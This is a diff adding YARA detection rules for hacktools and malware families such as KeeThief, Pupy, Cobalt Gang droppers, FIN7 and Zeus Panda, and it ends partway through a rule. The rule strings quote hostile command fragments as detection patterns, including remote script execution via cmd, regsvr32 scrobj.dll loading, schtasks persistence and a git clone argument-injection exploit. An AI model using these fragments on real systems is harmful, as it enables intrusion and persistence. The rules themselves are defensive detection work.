+rule KeeTheft_Out_Shellcode_RID2FAA : DEMO HKTL SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Detects component of KeeTheft - KeePass dump tool - file Out-Shellcode.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/HarmJ0y/KeeThief"
+      date = "2017-08-29 12:06:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2afb1c8c82363a0ae43cad9d448dd20bb7d2762aa5ed3672cd8e14dee568e16b"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Write-Host \"Shellcode length: 0x$(($ShellcodeLength + 1).ToString('X4'))\"" fullword ascii
+      $x2 = "$TextSectionInfo = @($MapContents | Where-Object { $_ -match '\\.text\\W+CODE' })[0]" fullword ascii
+   condition: 
+      ( filesize < 2KB and 1 of them )
+}
+
+rule Hacktool_PasswordsPro_RID2F9C : DEMO EXE FILE HKTL {
+   meta:
+      description = "Semiautomatically generated YARA rule - file PasswordsPro.exe"
+      author = "Florian Roth"
+      reference = "PasswordPro"
+      date = "2017-08-27 12:04:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5b3d6654e6d9dc49ee1136c0c8e8122cb0d284562447abfdc05dfe38c79f95bf"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "No users marked for attack or all marked users already have passwords found!" fullword ascii
+      $s2 = "%s\\PasswordsPro.ini.Dictionaries(%d)" fullword ascii
+      $s3 = "Passwords processed since attack start:" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
+}
+
+rule PasswordPro_NTLM_DLL_RID2E6A : DEMO EXE FILE HKTL {
+   meta:
+      description = "Semiautomatically generated YARA rule - file NTLM.dll"
+      author = "Florian Roth"
+      reference = "PasswordPro"
+      date = "2017-08-27 11:13:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "47d4755d31bb96147e6230d8ea1ecc3065da8e557e8176435ccbcaea16fe50de"
+      tags = "DEMO, EXE, FILE, HKTL"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $s1 = "NTLM.dll" fullword ascii
+      $s2 = "Algorithm: NTLM" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 20KB and pe.exports ( "GetHash" ) and pe.exports ( "GetInfo" ) and ( all of them ) )
+}
+
+rule JavaScript_Run_Suspicious_RID3132 : DEMO SCRIPT T1064 {
+   meta:
+      description = "Detects a suspicious Javascript Run command"
+      author = "Florian Roth"
+      reference = "https://twitter.com/craiu/status/900314063560998912"
+      date = "2017-08-23 13:12:11"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1064"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "w = new ActiveXObject(" ascii
+      $s2 = " w.Run(r);" fullword ascii
+   condition: 
+      all of them
+}
+
+rule Datper_Backdoor_RID2CF5 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Datper Malware"
+      author = "Florian Roth"
+      reference = "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html"
+      date = "2017-08-21 10:11:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7d70d659c421b50604ce3e0a1bf423ab7e54b9df361360933bac3bb852a31849"
+      hash2 = "331ac0965b50958db49b7794cc819b2945d7b5e5e919c185d83e997e205f107b"
+      hash3 = "90ac1fb148ded4f46949a5fea4cd8c65d4ea9585046d66459328a5866f8198b2"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "RtlGetCo" fullword ascii
+      $s2 = "hutils" fullword ascii
+      $s3 = "kza2FWU,f;\"3U&zpa3U(W`J" fullword ascii
+      $c1 = "dkkwldngn" fullword ascii
+      $c2 = "ndkkwqgcm" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "58db98e2334746d349d607e4d73bc5ea" or pe.imphash ( ) == "8fbed921458af485ce84fb7d9b13899e" or ( 2 of ( $s* ) and 1 of ( $c* ) ) or ( $s3 and $c1 ) ) )
+}
+
+rule Suspicious_Script_Running_from_HTTP_RID350E : DEMO SCRIPT T1064 {
+   meta:
+      description = "Detects a suspicious "
+      author = "Florian Roth"
+      reference = "https://www.hybrid-analysis.com/sample/a112274e109c5819d54aa8de89b0e707b243f4929a83e77439e3ff01ed218a35?environmentId=100"
+      date = "2017-08-20 15:56:51"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1064"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "cmd /C script:http://" ascii nocase
+      $s2 = "cmd /C script:https://" ascii nocase
+      $s3 = "cmd.exe /C script:http://" ascii nocase
+      $s4 = "cmd.exe /C script:https://" ascii nocase
+   condition: 
+      1 of them
+}
+
+rule Reflective_DLL_Loader_Aug17_1_RID317F : DEMO EXE FILE HKTL T1055 {
+   meta:
+      description = "Detects Reflective DLL Loader"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-08-20 13:25:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f2f85855914345eec629e6fc5333cf325a620531d1441313292924a88564e320"
+      tags = "DEMO, EXE, FILE, HKTL, T1055"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "\\Release\\reflective_dll.pdb" ascii
+      $x2 = "reflective_dll.x64.dll" fullword ascii
+      $s3 = "DLL Injection" fullword ascii
+      $s4 = "?ReflectiveLoader@@YA_KPEAX@Z" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "4bf489ae7d1e6575f5bb81ae4d10862f" or pe.exports ( "?ReflectiveLoader@@YA_KPEAX@Z" ) or ( 1 of ( $x* ) or 2 of them ) ) ) or ( 2 of them )
+}
+
+rule DLL_Injector_Lynx_RID2D94 : DEMO EXE FILE HKTL {
+   meta:
+      description = "Detects Lynx DLL Injector"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-08-20 10:37:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d594f60e766e0c3261a599b385e3f686b159a992d19fa624fad8761776efa4f0"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = " -p <TARGET PROCESS NAME> | -u <DLL PAYLOAD> [--obfuscate]" fullword wide
+      $x2 = "You've selected to inject into process: %s" fullword wide
+      $x3 = "Lynx DLL Injector" fullword wide
+      $x4 = "Reflective DLL Injector" fullword wide
+      $x5 = "Failed write payload: %lu" fullword wide
+      $x6 = "Failed to start payload: %lu" fullword wide
+      $x7 = "Injecting payload..." fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 800KB and 1 of them ) or ( 3 of them )
+}
+
+rule Reflective_DLL_Loader_Aug17_3_RID3181 : DEMO EXE FILE HKTL T1055 {
+   meta:
+      description = "Detects Reflective DLL Loader"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-08-20 13:25:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      hash1 = "d10e4b3f1d00f4da391ac03872204dc6551d867684e0af2a4ef52055e771f474"
+      tags = "DEMO, EXE, FILE, HKTL, T1055"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "\\Release\\inject.pdb" ascii
+      $s2 = "!!! Failed to gather information on system processes! " fullword ascii
+      $s3 = "reflective_dll.dll" fullword ascii
+      $s4 = "[-] %s. Error=%d" fullword ascii
+      $s5 = "\\Start Menu\\Programs\\reflective_dll.dll" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "26ba48d3e3b964f75ff148b6679b42ec" or 2 of them ) ) or ( 3 of them )
+}
+
+rule Reflective_DLL_Loader_Aug17_4_RID3182 : DEMO EXE FILE HKTL T1055 {
+   meta:
+      description = "Detects Reflective DLL Loader"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-08-20 13:25:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "205b881701d3026d7e296570533e5380e7aaccaa343d71b6fcc60802528bdb74"
+      hash2 = "f76151646a0b94024761812cde1097ae2c6d455c28356a3db1f7905d3d9d6718"
+      tags = "DEMO, EXE, FILE, HKTL, T1055"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "<H1>&nbsp;>> >> >> Keylogger Installed - %s %s << << <<</H1>" fullword ascii
+      $s1 = "<H3> ----- Running Process ----- </H3>" fullword ascii
+      $s2 = "<H2>Operating system: %s<H2>" fullword ascii
+      $s3 = "<H2>System32 dir:  %s</H2>" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them )
+}
+
+rule ShadowPad_nssock2_RID2DAE : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malicious nssock2.dll from ShadowPad incident - file nssock2.dll"
+      author = "Florian Roth"
+      reference = "https://securelist.com/shadowpad-in-corporate-networks/81432/"
+      date = "2017-08-15 10:42:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "462a02a8094e833fd456baf0a6d4e18bb7dab1a9f74d5f163a8334921a4ffde8"
+      hash2 = "c45116a22cf5695b618fcdf1002619e8544ba015d06b2e1dbf47982600c7545f"
+      hash3 = "696be784c67896b9239a8af0a167add72b1becd3ef98d03e99207a3d5734f6eb"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "c67de089f2009b21715744762fc484e8" or pe.imphash ( ) == "11522f7d4b2fc05acba8f534ca1b828a" ) )
+}
+
+rule Pupy_Backdoor_RID2C43 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Pupy backdoor"
+      author = "Florian Roth"
+      reference = "https://github.com/n1nj4sec/pupy-binaries"
+      date = "2017-08-11 09:41:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153"
+      hash2 = "83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4"
+      hash3 = "90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "reflectively inject a dll into a process." fullword ascii
+      $x2 = "ld_preload_inject_dll(cmdline, dll_buffer, hook_exit) -> pid" fullword ascii
+      $x3 = "LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null" fullword ascii
+      $x4 = "reflective_inject_dll" fullword ascii
+      $x5 = "ld_preload_inject_dll" fullword ascii
+      $x6 = "get_pupy_config() -> string" fullword ascii
+      $x7 = "[INJECT] inject_dll. OpenProcess failed." fullword ascii
+      $x8 = "reflective_inject_dll" fullword ascii
+      $x9 = "reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)" fullword ascii
+      $x10 = "linux_inject_main" fullword ascii
+   condition: 
+      ( ( uint16 ( 0 ) == 0x457f or uint16 ( 0 ) == 0x5a4d ) and filesize < 7000KB and 1 of them ) or 3 of them or ( uint16 ( 0 ) == 0x5a4d and pe.imphash ( ) == "84a69bce2ff6d9f866b7ae63bd70b163" )
+}
+
+rule PowerShell_Case_Anomaly_RID3021 : ANOMALY DEMO OBFUS SCRIPT SUSP T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects obfuscated PowerShell hacktools"
+      author = "Florian Roth"
+      reference = "https://twitter.com/danielhbohannon/status/905096106924761088"
+      date = "2017-08-11 12:26:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-06-12"
+      tags = "ANOMALY, DEMO, OBFUS, SCRIPT, SUSP, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "powershell" nocase ascii wide
+      $sn1 = "powershell" ascii wide
+      $sn2 = "Powershell" ascii wide
+      $sn3 = "PowerShell" ascii wide
+      $sn4 = "POWERSHELL" ascii wide
+      $sn5 = "powerShell" ascii wide
+      $sn6 = "PowerShelL" ascii wide
+      $sn7 = "PowershelL" ascii wide
+      $a1 = "wershell -e " nocase wide ascii
+      $an1 = "wershell -e " wide ascii
+      $an2 = "werShell -e " wide ascii
+      $k1 = "-noprofile" fullword nocase ascii wide
+      $kn1 = "-noprofile" ascii wide
+      $kn2 = "-NoProfile" ascii wide
+      $kn3 = "-noProfile" ascii wide
+      $kn4 = "-NOPROFILE" ascii wide
+      $kn5 = "-Noprofile" ascii wide
+      $fp1 = "Microsoft Code Signing" ascii fullword
+      $fp2 = "Microsoft Corporation" ascii
+      $fp3 = "Microsoft.Azure.Commands.ContainerInstance" wide
+      $fp4 = "# Localized PSGet.Resource.psd1" wide
+   condition: 
+      filesize < 800KB and ( ( #s1 > #sn1 + #sn2 + #sn3 + #sn4 + #sn5 + #sn6 + #sn7 ) or ( #a1 > #an1 + #an2 ) or ( #k1 > #kn1 + #kn2 + #kn3 + #kn4 + #kn5 ) ) and not 1 of ( $fp* )
+}
+
+rule git_CVE_2017_9800_poc_RID2D8C : CVE_2017_9800 DEMO EXPLOIT SUSP {
+   meta:
+      description = "Detects a CVE-2017-9800 exploitation attempt"
+      author = "Florian Roth"
+      reference = "https://twitter.com/mzbat/status/895811803325898753"
+      date = "2017-08-11 10:36:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2017_9800, DEMO, EXPLOIT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "git clone ssh://-oProxyCommand=" ascii
+      $s2 = "git clone http://-" ascii
+      $s3 = "git clone https://-" ascii
+   condition: 
+      filesize < 200KB and 1 of them
+}
+
+rule CobaltStrike_CN_Group_BeaconDropper_Aug17_RID369B : CHINA COBALTSTRIKE DEMO G0080 MAL S0154 SCRIPT T1075 T1117 {
+   meta:
+      description = "Detects Script Dropper of Cobalt Gang used in August 2017"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-08-09 17:03:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fc0fad39b461eb1cfc6be57932993fcea94fca650564271d1b74dd850c81602f"
+      hash2 = "1c845bb0f6b9a96404af97dcafdc77f1629246e840c01dd9f1580a341f554926"
+      hash3 = "6206e372870ea4f363be53557477f9748f1896831a0cdef3b8450a7fb65b86e1"
+      tags = "CHINA, COBALTSTRIKE, DEMO, G0080, MAL, S0154, SCRIPT, T1075, T1117"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "WriteLine(\"(new ActiveXObject('WScript.Shell')).Run('cmd /c c:/" ascii
+      $x2 = "WriteLine(\" (new ActiveXObject('WScript.Shell')).Run('regsvr32 /s" ascii
+      $x3 = "sh.Run(env('cmd /c set > %temp%" ascii
+      $x4 = "sh.Run('regsvr32 /s /u /i:" ascii
+      $x5 = ".Get('Win32_ScheduledJob').Create('regsvr32 /s /u /i:" ascii
+      $x6 = "scrobj.dll','********" ascii
+      $x7 = "www.thyssenkrupp-marinesystems.org" fullword ascii
+      $x8 = "f.WriteLine(\" tLnk=env('%tmp%/'+lnkName+'.lnk');\");" fullword ascii
+      $x9 = "lnkName='office 365'; " fullword ascii
+      $x10 = ";sh=x('WScript.Shell');" ascii
+   condition: 
+      ( filesize < 200KB and 1 of them )
+}
+
+rule CobaltGang_Malware_Aug17_1_RID307F : DEMO EXE FILE G0080 MAL {
+   meta:
+      description = "Detects a Cobalt Gang malware"
+      author = "Florian Roth"
+      reference = "https://sslbl.abuse.ch/intel/6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c"
+      date = "2017-08-09 12:42:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6d70673b723f338b3febc9f1d69463bdd4775539cb92b5a5d8fccc0d977fa2f0"
+      tags = "DEMO, EXE, FILE, G0080, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ServerSocket.EXE" fullword wide
+      $s2 = "Incorrect version of WS2_32.dll found" fullword ascii
+      $s3 = "Click 'Connect' to Connect to the Server.  'Disconnect' to disconnect from server." fullword wide
+      $s4 = "Click 'Start' to start the Server.  'Stop' to Stop it." fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and 3 of them )
+}
+
+rule CobaltGang_Malware_Aug17_2_RID3080 : DEMO EXE FILE G0080 MAL {
+   meta:
+      description = "Detects a Cobalt Gang malware"
+      author = "Florian Roth"
+      reference = "https://sslbl.abuse.ch/intel/6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c"
+      date = "2017-08-09 12:42:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "80791d5e76782cc3cd14f37f351e33b860818784192ab5b650f1cdf4f131cf72"
+      tags = "DEMO, EXE, FILE, G0080, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; BOIE9;ENGB)" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 80KB and all of them )
+}
+
+rule Agent_BTZ_Proxy_DLL_1_RID2E9B : DEMO EXE FILE HKTL MAL T1090 {
+   meta:
+      description = "Detects Agent-BTZ Proxy DLL - activeds.dll"
+      author = "Florian Roth"
+      reference = "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/"
+      date = "2017-08-07 11:21:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9c163c3f2bd5c5181147c6f4cf2571160197de98f496d16b38c7dc46b5dc1426"
+      hash2 = "628d316a983383ed716e3f827720915683a8876b54677878a7d2db376d117a24"
+      tags = "DEMO, EXE, FILE, HKTL, MAL, T1090"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Modules" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them and pe.exports ( "Entry" ) )
+}
+
+rule Agent_BTZ_Aug17_RID2C33 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Agent.BTZ"
+      author = "Florian Roth"
+      reference = "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/"
+      date = "2017-08-07 09:39:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6ad78f069c3619d0d18eef8281219679f538cfe0c1b6d40b244beb359762cf96"
+      hash2 = "49c5c798689d4a54e5b7099b647b0596fb96b996a437bb8241b5dd76e974c24e"
+      hash3 = "e88970fa4892150441c1616028982fe63c875f149cd490c3c910a1c091d3ad49"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $s1 = "stdole2.tlb" fullword ascii
+      $s2 = "UnInstallW" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 900KB and all of them and pe.exports ( "Entry" ) and pe.exports ( "InstallW" ) and pe.exports ( "UnInstallW" ) )
+}
+
+rule Zeus_Panda_RID2AFB : CHINA DEMO EXE FILE MAL {
+   meta:
+      description = "Detects ZEUS Panda Malware"
+      author = "Florian Roth"
+      reference = "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf"
+      date = "2017-08-04 08:47:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "bd956b2e81731874995b9b92e20f75dbf67ac5f12f9daa194525e1b673c7f83c"
+      tags = "CHINA, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "SER32.dll" fullword ascii
+      $x2 = "/c start \"\" \"%s\"" fullword wide
+      $x3 = "del /F \"%s\"" fullword ascii
+      $s1 = "bcdfghklmnpqrstvwxz" fullword ascii
+      $s2 = "=> -,0;" fullword ascii
+      $s3 = "Yahoo! Slurp" fullword ascii
+      $s4 = "ZTNHGET ^&" fullword ascii
+      $s5 = "MSIE 9" fullword ascii
+      $s6 = "%s%08x.%s" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and ( 2 of ( $x* ) or 4 of them )
+}
+
+rule FIN7_Backdoor_Aug17_RID2D8D : DEMO EXE G0046 MAL OFFICE RUSSIA T1053 {
+   meta:
+      description = "Detects Word Dropper from Proofpoint FIN7 Report"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor"
+      date = "2017-08-04 10:36:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, G0046, MAL, OFFICE, RUSSIA, T1053"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "wscript.exe //b /e:jscript C:\\Users\\" ascii
+      $x2 = "wscript.exe /b /e:jscript C:\\Users\\" ascii
+      $x3 = "schtasks /Create /f /tn \"GoogleUpdateTaskMachineSystem\" /tr \"wscript.exe" ascii nocase
+      $x4 = "schtasks /Delete /F /TN \"\"GoogleUpdateTaskMachineCore" ascii nocase
+      $x5 = "schtasks /Delete /F /TN \"GoogleUpdateTaskMachineCore" ascii nocase
+      $x6 = "wscript.exe //b /e:jscript %TMP%\\debug.txt" ascii
+      $s1 = "/?page=wait" fullword ascii
+      $a1 = "autoit3.exe" fullword ascii
+      $a2 = "dumpcap.exe" fullword ascii
+      $a3 = "tshark.exe" fullword ascii
+      $a4 = "prl_cc.exe" fullword ascii
+      $v1 = "vmware" fullword ascii
+      $v2 = "PCI\\\\VEN_80EE&DEV_CAFE" fullword ascii
+      $v3 = "VMWVMCIHOSTDEV" fullword ascii
+      $c1 = "apowershell" fullword ascii
+      $c2 = "wpowershell" fullword ascii
+      $c3 = "get_passwords" fullword ascii
+      $c4 = "kill_process" fullword ascii
+      $c5 = "get_screen" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 5000KB and ( 1 of ( $x* ) or all of ( $a* ) or all of ( $v* ) or 3 of ( $c* ) ) ) or 5 of them
+}
+
+rule Unknown_Malware_Sample_Jul17_2_RID326D : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects unknown malware sample with pastebin RAW URL"
+      author = "Florian Roth"
+      reference = "https://goo.gl/iqH8CK"
+      date = "2017-08-01 14:04:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "4System.Web.Services.Protocols.SoapHttpClientProtocol" fullword ascii
+      $s2 = "https://pastebin.com/raw/" wide
+      $s3 = "My.Computer" fullword ascii
+      $s4 = "MyTemplate" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+}
+
+rule Foudre_Backdoor_1_RID2D8A : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Foudre Backdoor"
+      author = "Florian Roth"
+      reference = "https://goo.gl/Nbqbt6"
+      date = "2017-08-01 10:36:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7e73a727dc8f3c48e58468c3fd0a193a027d085f25fa274a6e187cf503f01f74"
+      hash2 = "7ce2c5111e3560aa6036f98b48ceafe83aa1ac3d3b33392835316c859970f8bc"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "initialization failed: Reinstall the program" fullword wide
+      $s2 = "SnailDriver V1" fullword wide
+      $s3 = "lp.ini" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 2 of them )
+}
+
+rule Foudre_Backdoor_SFX_RID2E4A : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Foudre Backdoor SFX"
+      author = "Florian Roth"
+      reference = "https://goo.gl/Nbqbt6"
+      date = "2017-08-01 11:08:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2b37ce9e31625d8b9e51b88418d4bf38ed28c77d98ca59a09daab01be36d405a"
+      hash2 = "4d51a0ea4ecc62456295873ff135e4d94d5899c4de749621bafcedbf4417c472"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "main.exe" fullword ascii
+      $s2 = "pub.key" fullword ascii
+      $s3 = "WinRAR self-extracting archive" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+}
+
+rule CACTUSTORCH_RID2A54 : DEMO HKTL T1085 {
+   meta:
+      description = "Detects CactusTorch Hacktool"
+      author = "Florian Roth"
+      reference = "https://github.com/mdsecactivebreach/CACTUSTORCH_RID2A54"
+      date = "2017-07-31 05:11:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "314e6d7d863878b6dca46af165e7f08fedd42c054d7dc3828dc80b86a3a9b98c"
+      hash2 = "0305aa32d5f8484ca115bb4888880729af7f33ac99594ec1aa3c65644e544aea"
+      hash3 = "a52d802e34ac9d7d3539019d284b04ded3b8e197d5e3b38ed61f523c3d68baa7"
+      tags = "DEMO, HKTL, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "$payload = shellcode(%options[\"listener\"], \"true\", \"x86\");" fullword ascii
+      $x2 = "Copy the base64 encoded payload into the code variable below." fullword ascii
+      $x3 = " CACTUSTORCH_RID2A54 Payload" ascii
+      $x4 = "ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)" fullword ascii
+      $x5 = "' Author: Vincent Yiu (@vysecurity)" fullword ascii
+      $x6 = "Dim binary : binary = \"rundll32.exe\"" fullword ascii
+      $a1 = "code = code & \"" ascii
+      $a2 = "serialized_obj = serialized_obj & \"" ascii
+      $s1 = "binary = \"rundll32.exe\"" fullword ascii
+      $s2 = "EL.DataType = \"bin.hex\"" fullword ascii
+      $s3 = "Set stm = CreateObject(\"System.IO.MemoryStream\")" fullword ascii
+      $s4 = "var binary = \"rundll32.exe\";" fullword ascii
+      $s5 = "var serialized_obj = \"" ascii
+   condition: 
+      ( filesize < 800KB and ( 1 of ( $x* ) or ( 1 of ( $a* ) and 1 of ( $s* ) ) ) ) or ( 3 of them )
+}
+
+rule SUSP_MyWScript_RID2C4D : DEMO EXE FILE MAL SUSP {
+   meta:
+      description = "Detects files generated with Script2Exe"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-07-27 09:43:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "515f5188ba6d039b8c38f60d3d868fa9c9726e144f593066490c7c97bf5090c8"
+      tags = "DEMO, EXE, FILE, MAL, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "C:\\Projets\\vbsedit_source\\script2exe\\Release\\mywscript.pdb" fullword ascii
+      $s1 = "mywscript2" fullword wide
+      $s2 = "MYWSCRIPT2" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 800KB and ( $x1 or 2 of them )
+}
+
+rule PowerShell_Emp_Eval_Jul17_A1_RID3141 : DEMO EXE FILE HKTL SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Detects suspicious sample with PowerShell content "
+      author = "Florian Roth"
+      reference = "PowerShell Empire Eval"
+      date = "2017-07-27 13:14:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4d10e80c7c80ef040efc680424a429558c7d76a965685bbc295908cb71137eba"
+      tags = "DEMO, EXE, FILE, HKTL, SCRIPT, T1059_001, T1086"
